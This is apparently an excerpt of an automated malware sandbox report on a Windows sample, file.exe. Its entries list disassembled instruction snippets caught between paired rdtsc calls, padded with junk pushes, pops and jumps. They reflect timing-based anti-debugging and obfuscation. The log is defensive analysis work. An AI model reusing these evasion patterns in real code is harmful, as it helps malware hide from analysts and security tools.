                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70ED3 second address: E70ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70ED9 second address: E70EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 jmp 00007F5408F96898h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70EFE second address: E70F04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6EE0D second address: E6EE2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F9688Fh 0x00000007 pushad 0x00000008 jmp 00007F5408F9688Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6EF7D second address: E6EF81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6EF81 second address: E6EF8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F0D4 second address: E6F0DC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F3C2 second address: E6F3CC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5408F96886h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F3CC second address: E6F3DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5408C2110Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F3DE second address: E6F3E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F3E4 second address: E6F400 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C21116h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F400 second address: E6F40A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5408F96886h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F40A second address: E6F40E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F7CA second address: E6F7D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F7D0 second address: E6F7F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007F5408C21110h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F7F5 second address: E6F7F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F7F9 second address: E6F7FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F7FF second address: E6F805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F805 second address: E6F81F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5408C21115h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F81F second address: E6F825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6F971 second address: E6F985 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C21110h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6FAFC second address: E6FB0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F5408F96886h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6FB0D second address: E6FB11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6FC48 second address: E6FC59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jne 00007F5408F96886h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6FC59 second address: E6FC78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F5408C2110Bh 0x0000000f jc 00007F5408C2110Eh 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6FC78 second address: E6FC80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6FC80 second address: E6FC84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6FDC7 second address: E6FDD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F5408F96886h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6FDD1 second address: E6FDE1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F5408C21106h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E48A84 second address: E48A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70055 second address: E70068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5408C2110Eh 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E705DD second address: E705E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E705E1 second address: E705F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F5408C21106h 0x0000000d jbe 00007F5408C21106h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E705F6 second address: E70601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70601 second address: E70617 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5408C21106h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F5408C21106h 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70617 second address: E7061B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70904 second address: E7090E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5408C21106h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7090E second address: E70917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E70917 second address: E70920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E37BD1 second address: E37BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 je 00007F5408F96892h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E37BE2 second address: E37C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5408C21106h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5408C21117h 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E37C09 second address: E37C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E37C0E second address: E37C2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5408C21119h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E37C2B second address: E37C48 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F5408F96891h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E79512 second address: E7954B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5408C2110Eh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jns 00007F5408C21106h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5408C21110h 0x00000017 jmp 00007F5408C21117h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7B7E9 second address: E7B7ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7B7ED second address: E7B804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5408C2110Fh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7EA9D second address: E7EADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F96891h 0x00000007 jmp 00007F5408F9688Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007F5408F9688Bh 0x00000015 jno 00007F5408F96886h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jne 00007F5408F96886h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7EADD second address: E7EAE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7EAE1 second address: E7EAE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7ED7B second address: E7ED81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7F2B9 second address: E7F2BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E7F2BD second address: E7F2C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E80D54 second address: E80D5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81165 second address: E8116B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8116B second address: E81170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81268 second address: E8127F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C2110Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8179A second address: E8179E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81936 second address: E8193C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81B93 second address: E81B98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81B98 second address: E81B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81B9E second address: E81BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F5408F9688Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81BB4 second address: E81BB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81C83 second address: E81C96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5408F9688Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E82306 second address: E82322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5408C21118h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E82322 second address: E82326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E83EE7 second address: E83EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E835AC second address: E835B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E83EED second address: E83EF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E835B9 second address: E835BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E868FC second address: E86903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E85235 second address: E85250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5408F96897h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E398 second address: E8E39E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8F4E4 second address: E8F4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8F583 second address: E8F589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E661 second address: E8E674 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F9688Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E674 second address: E8E67A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E925B1 second address: E925C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F5408F96886h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9162A second address: E9163D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5408C2110Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E90728 second address: E90730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E925C2 second address: E925D7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5408C2110Dh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E93829 second address: E93836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F5408F96886h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E95574 second address: E9557A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9557A second address: E955B2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5408F96888h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, dword ptr [ebp+122D276Ch] 0x00000013 push 00000000h 0x00000015 or edi, 672A7537h 0x0000001b push 00000000h 0x0000001d pushad 0x0000001e push ecx 0x0000001f cld 0x00000020 pop esi 0x00000021 jnc 00007F5408F9688Ch 0x00000027 popad 0x00000028 mov bx, dx 0x0000002b push eax 0x0000002c push esi 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E96452 second address: E96457 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9579D second address: E957A2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E97398 second address: E97428 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C2110Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ebx, dword ptr [ebp+122D234Dh] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F5408C21108h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e mov bl, 13h 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebp 0x00000035 call 00007F5408C21108h 0x0000003a pop ebp 0x0000003b mov dword ptr [esp+04h], ebp 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc ebp 0x00000048 push ebp 0x00000049 ret 0x0000004a pop ebp 0x0000004b ret 0x0000004c mov dword ptr [ebp+122D1820h], edx 0x00000052 xchg eax, esi 0x00000053 pushad 0x00000054 pushad 0x00000055 jmp 00007F5408C21116h 0x0000005a pushad 0x0000005b popad 0x0000005c popad 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F5408C2110Ch 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E983F0 second address: E983F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E983F4 second address: E983F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E98462 second address: E9846C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5408F9688Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9A6DA second address: E9A6E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F5408C21106h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9A6E4 second address: E9A6F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9A6F2 second address: E9A6F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9865F second address: E9866D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F9688Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9653F second address: E96557 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5408C21110h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9D73F second address: E9D74F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F5408F9688Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9D74F second address: E9D76B instructions: 0x00000000 rdtsc 0x00000002 js 00007F5408C2110Ah 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f jmp 00007F5408C2110Ah 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9D76B second address: E9D771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9DCC8 second address: E9DCE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C21110h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
